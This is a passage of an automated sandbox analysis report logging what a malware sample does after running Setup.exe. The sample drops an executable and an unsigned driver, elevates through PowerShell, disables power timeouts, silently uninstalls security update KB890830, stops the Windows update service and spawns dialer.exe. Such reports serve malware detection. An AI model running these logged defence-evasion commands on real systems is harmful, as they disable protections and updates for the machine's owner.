          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeKey opened: HKEY_USERS.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
          Source: MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zipStatic file information: File size 4442123 > 1048576
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorSYSTE source: svchost.exe, 00000057.00000002.2504659405.0000029D50218000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000000.1495352991.0000029D50213000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58318b source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: _prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2* source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wctA360.tmp.pdb\* source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\acrobat_sbx.pdb source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctA360.tmp.pdb source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb001\* source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: jnxsifnrdetl.exe, 00000035.00000003.1466293932.0000026FC3DC0000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2AC2 source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000057.00000002.2581903644.0000029D50263000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831-B09 source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbll source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbll source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Suspicious powershell command line found
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAsJump to behavior
          Source: C:\Windows\System32\dialer.exeCode function: 81_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,81_2_00000001408460F0
          Source: jnxsifnrdetl.exe.17.drStatic PE information: section name: .00cfg
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeCode function: 3_2_000000343D8FF418 push eax; iretd 3_2_000000343D8FF63A
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeCode function: 17_2_000000EE88D8F238 push eax; iretd 17_2_000000EE88D8F26A
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeCode function: 53_2_000000C7CB98F133 push eax; iretd 53_2_000000C7CB98F14A
          Source: C:\Windows\System32\dialer.exeCode function: 80_2_0000000140001394 push qword ptr [0000000140009004h]; ret 80_2_0000000140001403
          Source: C:\Windows\System32\dasHost.exeCode function: 131_2_000002809239C6DD push rcx; retf 003Fh131_2_000002809239C6DE

          Persistence and Installation Behavior

          barindex
          Sample is not signed and drops a device driver
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeFile created: C:\Windows\TEMP\sidneyeifgjd.sys
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeFile created: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeJump to dropped file
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeFile created: C:\Windows\Temp\sidneyeifgjd.sysJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeFile created: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeJump to dropped file
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeFile created: C:\Windows\Temp\sidneyeifgjd.sysJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
